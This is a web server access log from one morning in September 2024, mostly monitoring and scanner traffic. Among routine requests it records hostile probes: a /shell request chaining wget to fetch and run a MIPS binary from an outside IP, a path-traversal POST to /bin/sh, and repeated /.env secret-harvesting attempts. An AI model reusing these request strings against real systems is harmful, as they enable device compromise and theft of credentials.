45.156.129.50 - - [05/Sep/2024:06:17:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
93.174.93.12 - - [05/Sep/2024:06:17:41 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
185.224.128.59 - - [05/Sep/2024:06:18:04 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.191.126.213 - - [05/Sep/2024:06:19:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
93.174.93.12 - - [05/Sep/2024:06:19:20 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
95.214.55.138 - - [05/Sep/2024:06:20:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
71.6.134.234 - - [05/Sep/2024:06:23:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
149.50.103.48 - - [05/Sep/2024:06:23:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
71.6.134.234 - - [05/Sep/2024:06:25:09 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
154.216.18.39 - - [05/Sep/2024:06:25:35 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.18.39 - - [05/Sep/2024:06:25:36 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.18.39 - - [05/Sep/2024:06:26:11 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.18.39 - - [05/Sep/2024:06:26:11 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.18.39 - - [05/Sep/2024:06:26:21 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.18.39 - - [05/Sep/2024:06:26:21 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.18.39 - - [05/Sep/2024:06:26:39 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.18.39 - - [05/Sep/2024:06:26:43 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.18.39 - - [05/Sep/2024:06:27:10 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.18.39 - - [05/Sep/2024:06:27:10 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.18.39 - - [05/Sep/2024:06:27:19 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.18.39 - - [05/Sep/2024:06:27:19 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.18.39 - - [05/Sep/2024:06:27:27 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.18.39 - - [05/Sep/2024:06:27:27 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.18.39 - - [05/Sep/2024:06:27:36 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.18.39 - - [05/Sep/2024:06:27:36 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.18.39 - - [05/Sep/2024:06:27:44 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.18.39 - - [05/Sep/2024:06:27:44 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.18.39 - - [05/Sep/2024:06:27:50 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.18.39 - - [05/Sep/2024:06:27:50 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.18.39 - - [05/Sep/2024:06:29:34 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.18.39 - - [05/Sep/2024:06:29:34 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
149.50.103.48 - - [05/Sep/2024:06:29:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.55.138 - - [05/Sep/2024:06:30:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
89.190.156.228 - - [05/Sep/2024:06:30:47 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.23.236.82/bins/mips;sh+/bins/mips HTTP/1.1" 404 306 "-" "Hello, world"
185.191.126.213 - - [05/Sep/2024:06:33:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [05/Sep/2024:06:33:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [05/Sep/2024:06:35:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
80.82.70.133 - - [05/Sep/2024:06:38:03 +0200] "GET / HTTP/1.0" 200 1229 "-" "Opera/7.51 (Windows NT 5.1; U) [en]"
80.82.77.202 - - [05/Sep/2024:06:38:53 +0200] "\x16\x03\x01" 501 318 "-" "-"
80.82.77.202 - - [05/Sep/2024:06:38:53 +0200] "GET /aaa9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
80.82.77.202 - - [05/Sep/2024:06:38:53 +0200] "\x16\x03\x01" 501 318 "-" "-"
80.82.77.202 - - [05/Sep/2024:06:38:53 +0200] "GET /aab9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
80.82.70.133 - - [05/Sep/2024:06:43:36 +0200] "GET / HTTP/1.0" 200 1229 "-" "Opera/7.51 (Windows NT 5.1; U) [en]"
185.224.128.47 - - [05/Sep/2024:06:44:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
185.191.126.213 - - [05/Sep/2024:06:49:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [05/Sep/2024:06:51:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
80.82.70.133 - - [05/Sep/2024:06:52:24 +0200] "GET / HTTP/1.0" 200 1229 "-" "Opera/7.51 (Windows NT 5.1; U) [en]"
45.148.10.247 - - [05/Sep/2024:06:52:33 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
185.16.39.118 - - [05/Sep/2024:06:57:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.156.129.46 - - [05/Sep/2024:06:58:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
149.50.103.48 - - [05/Sep/2024:06:59:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.148.10.247 - - [05/Sep/2024:07:01:09 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
45.148.10.247 - - [05/Sep/2024:07:05:50 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
149.50.103.48 - - [05/Sep/2024:07:05:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.47 - - [05/Sep/2024:07:06:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
167.71.180.171 - - [05/Sep/2024:07:06:52 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
185.191.126.213 - - [05/Sep/2024:07:06:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/Sep/2024:07:10:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2024:07:11:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
67.227.173.42 - - [05/Sep/2024:07:11:45 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://ivre.rocks/"
212.91.246.72 - - [05/Sep/2024:07:12:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2024:07:13:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2024:07:14:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.90.33.53 - - [05/Sep/2024:07:15:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [05/Sep/2024:07:15:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2024:07:16:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.145.97 - - [05/Sep/2024:07:17:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.97 - - [05/Sep/2024:07:17:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.97 - - [05/Sep/2024:07:17:03 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.97 - - [05/Sep/2024:07:17:03 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
212.91.246.72 - - [05/Sep/2024:07:17:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.180.140.6 - - [05/Sep/2024:07:17:48 +0200] "GET /sitecore/shell/sitecore.version.xml HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.191.126.213 - - [05/Sep/2024:07:18:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/Sep/2024:07:18:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2024:07:19:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2024:07:20:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [05/Sep/2024:07:21:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/Sep/2024:07:21:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.71.180.171 - - [05/Sep/2024:07:21:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
167.71.180.171 - - [05/Sep/2024:07:21:50 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "http://212.91.246.81/" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
212.91.246.72 - - [05/Sep/2024:07:22:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2024:07:23:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.148.10.247 - - [05/Sep/2024:07:23:45 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
212.91.246.72 - - [05/Sep/2024:07:24:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
67.227.173.42 - - [05/Sep/2024:07:24:57 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://ivre.rocks/"
212.91.246.72 - - [05/Sep/2024:07:25:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.184.182.114 - - [05/Sep/2024:07:25:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
212.91.246.72 - - [05/Sep/2024:07:26:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.148.10.247 - - [05/Sep/2024:07:27:15 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
212.91.246.72 - - [05/Sep/2024:07:27:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2024:07:28:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
154.216.18.39 - - [05/Sep/2024:07:29:20 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.18.39 - - [05/Sep/2024:07:29:21 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
212.91.246.72 - - [05/Sep/2024:07:29:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.141.40.117 - - [05/Sep/2024:07:29:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
212.91.246.72 - - [05/Sep/2024:07:30:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [05/Sep/2024:07:31:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/Sep/2024:07:31:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2024:07:32:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [05/Sep/2024:07:32:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/Sep/2024:07:33:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.254.59.113 - - [05/Sep/2024:07:34:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
212.91.246.72 - - [05/Sep/2024:07:34:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2024:07:35:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.47 - - [05/Sep/2024:07:35:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
185.191.126.213 - - [05/Sep/2024:07:36:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/Sep/2024:07:36:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [05/Sep/2024:07:37:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/Sep/2024:07:37:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.16.39.118 - - [05/Sep/2024:07:37:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [05/Sep/2024:07:38:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2024:07:39:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.127 - - [05/Sep/2024:07:39:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; rv:102.0) Gecko/20100101 Goanna/6.6 Firefox/102.0 PaleMoon/33.0.0"
216.218.206.69 - - [05/Sep/2024:07:39:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 15_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6,2 Mobile/15E148 Safari/604.1"
212.91.246.72 - - [05/Sep/2024:07:40:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2024:07:41:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.130 - - [05/Sep/2024:07:41:45 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
64.62.197.131 - - [05/Sep/2024:07:42:17 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 6.1; rv:102.0) Gecko/20100101 Goanna/6.6 Firefox/102.0 PaleMoon/33.0.0"
80.82.77.202 - - [05/Sep/2024:07:42:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; de-de; Galaxy S II Build/GRJ22) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
212.91.246.72 - - [05/Sep/2024:07:42:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
216.218.206.69 - - [05/Sep/2024:07:43:07 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0"
212.91.246.72 - - [05/Sep/2024:07:43:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
216.218.206.69 - - [05/Sep/2024:07:43:48 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (iPad; CPU OS 15_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6,2 Mobile/15E148 Safari/604.1"
80.82.77.202 - - [05/Sep/2024:07:44:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; de-de; Galaxy S II Build/GRJ22) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
212.91.246.72 - - [05/Sep/2024:07:44:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2024:07:45:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.10.26.183 - - [05/Sep/2024:07:46:01 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
185.191.126.213 - - [05/Sep/2024:07:46:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.16.39.118 - - [05/Sep/2024:07:46:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [05/Sep/2024:07:46:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [05/Sep/2024:07:46:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/Sep/2024:07:47:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [05/Sep/2024:07:47:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/Sep/2024:07:48:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2024:07:49:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.16.39.118 - - [05/Sep/2024:07:49:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [05/Sep/2024:07:50:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.148.10.247 - - [05/Sep/2024:07:51:00 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
212.91.246.72 - - [05/Sep/2024:07:51:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2024:07:52:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.47 - - [05/Sep/2024:07:52:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
